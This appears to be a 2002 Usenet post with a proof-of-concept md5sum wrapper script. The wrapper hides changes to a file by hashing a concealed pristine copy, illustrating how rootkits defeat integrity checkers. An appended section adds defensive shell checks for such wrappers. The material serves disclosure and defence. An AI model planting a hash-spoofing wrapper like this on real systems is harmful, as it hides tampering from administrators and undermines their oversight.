Re: http attack

From: RainbowHat (nHiATlE@blSackholeP.mAit.edMu.invalid)
Date: 04/03/02


< Nico Kadel-Garcia
>Insufficient. Some rootkits apparently replace md5sum. I'd suggest
>re-installing, it's usually a lot faster.

Here is a proof of concept. Please try. But real LKM or libc rootkits
are more sophisticated. MD5, AIDE and Tripwire are ineffective.

cd ~; mkdir bin; echo 31337 > bin/laden; md5sum bin/laden

6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden

echo 32i1 > bin/laden; md5sum bin/laden #chown -R usa.usa bin/laden

5a2f88c1de17af5707bb5c51b47b37a4 bin/laden

Copy and paste into a ./md5sum file and save.
-------------------8<------------------8<-------------------8<--------
#!/bin/sh
#
# This is not an April fool but proof of concept code.
#

#Vreal="$(which md5sum)"
Vreal='/usr/bin/md5sum'   # the genuine md5sum this wrapper forwards to

if [ "$(echo $1 | grep laden)" ] # here is a bug but simple
then
   # for the watched file, hash the pristine copy and print the requested path
   $Vreal dev/.cave/laden | sed "s,dev/\.cave/laden,$1,"
else
   $Vreal "$@"   # everything else goes to the real md5sum untouched
fi
-------------------8<------------------8<-------------------8<--------

chmod u+x ./md5sum; mkdir -p dev/.cave; echo 31337 > bin/laden
cp -a bin/laden dev/.cave; ./md5sum bin/laden

6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden

echo 32i1 > bin/laden; ./md5sum bin/laden #chown -R usa.usa bin/laden

6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden

-- 
Best Regards, RainbowHat. I support FULL DISCLOSURE.
----+----1----+----2----+----3----+----4----+----5----+----6----+----7
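As an added example (not from RainbowHat's post, nor from md5sum, AIDE or Tripwire), here are POSIX sh checks a defender can run against whatever md5sum PATH resolves to: is it a script wrapper rather than a binary, does PATH search the current directory, and does its output agree with an independent MD5 implementation. It assumes `head -c` is available and that either openssl or python3 is installed for the cross-check.

```sh
#!/bin/sh
# Constructed defensive checks, not code from the original post.
# A wrapper like the one above depends on three things, each tested here:
#  1. the md5sum that PATH resolves to is an interpreter script, not a binary;
#  2. PATH contains "." or an empty entry, so ./md5sum shadows the real one;
#  3. its output differs from an independent MD5 implementation.
# Assumes GNU/BSD `head -c` and either openssl or python3 (assumption).

# 0 if the file starts with "#!" (a script wrapper), 1 otherwise.
# coreutils md5sum is an ELF binary and starts with 0x7f 'E', not "#!".
is_script_wrapper() {
    [ -f "$1" ] || return 1
    [ "$(head -c 2 "$1" 2>/dev/null)" = "#!" ]
}

# 0 if PATH has a "." or an empty element (current directory is searched).
path_has_cwd() {
    case ":$PATH:" in
        *:.:*|*::*) return 0 ;;
        *)          return 1 ;;
    esac
}

# MD5 of a file via an implementation that is not md5sum at all.
independent_md5() {
    if command -v openssl >/dev/null 2>&1; then
        openssl dgst -md5 "$1" | sed 's/.*= //'
    elif command -v python3 >/dev/null 2>&1; then
        python3 -c 'import hashlib,sys; print(hashlib.md5(open(sys.argv[1],"rb").read()).hexdigest())' "$1"
    else
        return 2   # no independent implementation available
    fi
}

# Compare what the given (default: PATH-resolved) md5sum tool prints for a
# file against the independent digest. Prints OK or MISMATCH; returns 0 or 1.
check_md5sum_tool() {
    file="$1"
    tool="${2:-$(command -v md5sum)}"
    claimed="$("$tool" "$file" | cut -d' ' -f1)"
    actual="$(independent_md5 "$file")" || return 2
    if [ "$claimed" = "$actual" ]; then
        echo OK
    else
        echo MISMATCH; return 1
    fi
}

# Typical use, all three checks against the tool PATH hands you:
# is_script_wrapper "$(command -v md5sum)" && echo "md5sum is a script"
# path_has_cwd && echo "PATH searches the current directory"
# check_md5sum_tool /etc/hostname
```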